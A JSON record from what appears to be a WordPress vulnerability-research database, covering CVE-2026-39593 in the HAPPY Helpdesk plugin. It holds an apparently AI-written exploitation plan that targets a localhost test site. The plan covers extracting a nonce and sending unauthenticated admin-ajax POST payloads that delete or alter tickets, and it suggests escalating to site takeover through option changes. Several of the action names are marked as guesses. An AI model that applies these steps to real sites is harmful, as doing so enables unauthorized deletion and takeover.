[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRpOalXbC9x2V8jIYUeY_emh0m91C5GzQ0344A5MdvIM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-39593","happy-helpdesk-support-ticket-system-missing-authorization-2","HAPPY – Helpdesk Support Ticket System \u003C= 1.0.10 - Missing Authorization","The HAPPY – Helpdesk Support Ticket System plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.10. This makes it possible for unauthenticated attackers to perform an unauthorized action.","happy-helpdesk-support-ticket-system",null,"\u003C=1.0.10","1.0.11","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-16 00:00:00","2026-04-21 14:59:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3dae466b-c81a-4000-b40b-6b9fd0c7a30f?source=api-prod",6,[],"researched",false,3,"This research plan outlines the steps to identify and exploit a missing authorization vulnerability (CVE-2026-39593) in the **HAPPY – Helpdesk Support Ticket System** plugin.\n\n### 1. Vulnerability Summary\nThe vulnerability is a **Missing Authorization** flaw in versions up to 1.0.10. It occurs because a sensitive function is registered via the `wp_ajax_nopriv_` hook (allowing unauthenticated access) or the `wp_ajax_` hook (allowing any logged-in user access) without an accompanying `current_user_can()` check. This allows unauthenticated attackers to perform actions that should be restricted to administrators or ticket owners, such as modifying ticket statuses, deleting tickets, or altering plugin settings.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely related to ticket management (e.g., `happy_delete_ticket`, `happy_update_status`, or `happy_save_reply`). (inferred)\n*   **Method:** HTTP POST\n*   **Parameters:** `action`, `nonce`, and specific IDs (e.g., `ticket_id`, `id`).\n*   **Authentication:** None required (unauthenticated).\n\n### 3. Code Flow\n1.  **Entry Point:** The plugin registers AJAX handlers in its main class or an AJAX handler class (likely `includes\u002Fclass-happy-ajax.php` or similar).\n2.  **Hook Registration:** Look for lines like:\n    `add_action( 'wp_ajax_nopriv_HAPPY_ACTION', array( $this, 'HAPPY_FUNCTION' ) );`\n3.  **Vulnerable Function:** The `HAPPY_FUNCTION` will perform a database update or post deletion.\n4.  **The Flaw:** The function checks for a nonce (preventing CSRF) but fails to check `current_user_can( 'manage_options' )` or verify that the user owns the ticket being modified.\n\n### 4. Nonce Acquisition Strategy\nIf the vulnerable endpoint requires a nonce, follow these steps to retrieve it:\n\n1.  **Identify the Shortcode:** Search for shortcode registrations to find where the plugin's frontend UI is rendered.\n    *   `grep -rn \"add_shortcode\" .` (Look for names like `[happy_ticket_form]` or `[happy_support_ticket]`).\n2.  **Create a Trigger Page:**\n    *   `wp post create --post_type=page --post_title=\"Support\" --post_status=publish --post_content='[SHORTCODE_FOUND]'`\n3.  **Find the Localized Variable:** Search for the script localization code to find the JS variable name.\n    *   `grep -rn \"wp_localize_script\" .`\n    *   Identify the object name (e.g., `happy_vars`, `happy_ajax_obj`) and the nonce key (e.g., `nonce`, `ajax_nonce`). (inferred)\n4.  **Extract via Browser:**\n    *   Navigate to the page: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fsupport\")`\n    *   Extract: `browser_eval(\"window.happy_vars?.nonce\")` (Replace with actual variable\u002Fkey found).\n\n### 5. Test Data Setup\nBefore exploitation, we need a ticket to target.\n1.  **Identify Ticket Post Type:**\n    *   `grep -rn \"register_post_type\" .` (Likely `happy_ticket`). (inferred)\n2.  **Create a Victim Ticket:**\n    *   `wp post create --post_type=happy_ticket --post_title=\"Help Me\" --post_status=publish --post_content=\"Target ticket for deletion.\"`\n3.  **Note the ID:** Store the ID of the created post (e.g., `123`).\n\n### 6. Exploitation Strategy\nWe will attempt to perform a restricted action (e.g., deleting a ticket) unauthenticated.\n\n1.  **Discovery Phase:**\n    *   Grep for `wp_ajax_nopriv_` to identify unauthenticated actions.\n    *   Search those functions for `wp_delete_post` or `$wpdb->update`.\n2.  **Execution Phase (Example: Ticket Deletion):**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Payload:**\n        ```\n        action=happy_delete_ticket&ticket_id=123&nonce=EXTRACTED_NONCE\n        ```\n        *(Adjust parameter names based on discovery)*.\n\n### 7. Expected Results\n*   **Success:** The server returns a success response (e.g., `{\"success\":true}` or `1`).\n*   **Impact:** The ticket with ID `123` is moved to the trash or permanently deleted from the database.\n*   **Response Code:** `200 OK`.\n\n### 8. Verification Steps\n1.  **Check Post Existence:**\n    *   `wp post list --post_type=happy_ticket --post_status=any`\n    *   Confirm ID `123` is missing or status is `trash`.\n2.  **Check Database Directly (if needed):**\n    *   `wp db query \"SELECT post_status FROM wp_posts WHERE ID = 123;\"`\n\n### 9. Alternative Approaches\nIf ticket deletion is not the vulnerable action, check for:\n*   **Status Modification:** `action=happy_update_status&ticket_id=123&status=closed`.\n*   **Unauthorized Reply:** `action=happy_save_reply&ticket_id=123&message=AttackerReply`.\n*   **Settings Update:** Search for any `wp_ajax_nopriv_` that calls `update_option`. If an unauthenticated user can change `users_can_register` or `default_role`, escalate to full site takeover.\n\n### Discovery Commands for the Agent:\n```bash\n# 1. Find all unauthenticated AJAX actions\ngrep -r \"wp_ajax_nopriv_\" .\n\n# 2. Trace the function for one of the actions (e.g., 'happy_delete_ticket')\ngrep -r \"function happy_delete_ticket\" .\n\n# 3. Check for authorization and nonce verification in that function\n# Look for current_user_can and check_ajax_referer\n\n# 4. Find where nonces are localized to the frontend\ngrep -r \"wp_localize_script\" .\n```","The HAPPY – Helpdesk Support Ticket System plugin for WordPress is vulnerable to unauthorized action execution due to missing capability checks in its AJAX handlers in versions up to 1.0.10. This flaw allows unauthenticated attackers to perform administrative or owner-level actions, such as deleting support tickets or modifying their status.","1. Identify the target AJAX action (e.g., happy_delete_ticket or happy_update_status) and the target ticket ID.\n2. Obtain a valid AJAX nonce by visiting a public-facing page where the plugin's support shortcode is active and inspecting the localized JavaScript variables (e.g., happy_vars.nonce).\n3. Send an unauthenticated HTTP POST request to \u002Fwp-admin\u002Fadmin-ajax.php.\n4. Provide the 'action', 'nonce', and the target 'ticket_id' in the POST body.\n5. The server executes the sensitive function because it lacks a current_user_can() check to verify the requester's authorization.","gemini-3-flash-preview","2026-04-27 14:35:46","2026-04-27 14:36:16",{"type":32,"vulnerable_version":33,"fixed_version":9,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":9,"fixed_zip":9,"all_tags":36},"plugin","1.0.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-helpdesk-support-ticket-system\u002Ftags\u002F1.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-helpdesk-support-ticket-system.1.0.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-helpdesk-support-ticket-system\u002Ftags"]